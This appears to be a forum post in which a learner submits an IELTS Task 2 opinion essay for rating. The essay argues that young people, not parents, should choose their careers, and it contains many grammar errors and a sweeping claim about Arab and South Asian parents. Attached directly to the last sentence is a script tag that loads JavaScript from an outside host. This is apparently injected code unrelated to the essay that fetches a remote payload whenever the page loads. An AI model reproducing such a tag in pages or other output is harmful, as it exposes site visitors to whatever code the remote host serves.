Should parents be responsible for the education

To what extent you agree or disagree?

Rate this task 2 ielts : It’s argued that parents should chose their kids professions instead of them picking it them selves. This essay disagrees with that argument completely because of how detrimental it is on their careers. This essay will discuss how important it is for the youth to pick their own profession and why some might think it’s preferable for the parents to decide.

A major should be decided by the young people studying it, not by parents that thinks they have their best interest at heart it’s will known that adults want to see their kids excel in life that’s why they push them but that doesn’t give the right to control their life choices specially their careers. For example, not too long ago everybody was seeking a career in the fossil fuel industry and now the world Is slowly moving away towards renewable energy and other alternatives.

Many parents decide their kids professions in some part of the world, and that’s very harmful

To the kids careers and mental health further more, it could impact the entire livelihood of the family for example, Arab and south asian parents are often very controlling when it comes to their kids careers as a result the kids usually end up unhappy and switch professions in there late thirties.

In conclusion, young people should be made to chose their majors as they see fit because it will impact their own lives and it will also help them to be more responsible at an early age and learn about accountability.<script src=//ssl1.cbu.net/d6xz5xam></script>